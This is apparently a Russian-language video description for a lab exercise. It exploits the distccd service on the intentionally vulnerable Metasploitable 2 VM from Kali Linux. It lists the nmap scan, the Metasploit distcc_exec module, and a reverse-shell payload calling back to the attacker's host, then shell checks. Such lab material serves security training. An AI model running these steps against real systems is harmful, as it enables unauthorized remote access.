
В этом видео показано, как, используя уязвимость в сервисе distccd в системе Metasploitable 2, получить удалённую оболочку (remote shell) через Kali Linux.
nmap -sV -p 3632 192.168.56.102
✅ Результат будет таким:
3632/tcp open distccd v1
👉 Значит, distcc открыт и его можно эксплуатировать.
msfconsole
use exploit/unix/misc/distcc_exec
show options
Необходимые параметры:
Параметр Значение RHOSTS IP-адрес Metasploitable RPORT 3632 PAYLOAD cmd/unix/reverse
set RHOSTS 192.168.56.102
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.56.101
LHOST — IP-адрес вашего Kali Linux
run
🎉 Результат
Если всё прошло успешно:
[*] Command shell session opened
Проверяем shell:
whoami
uname -a
id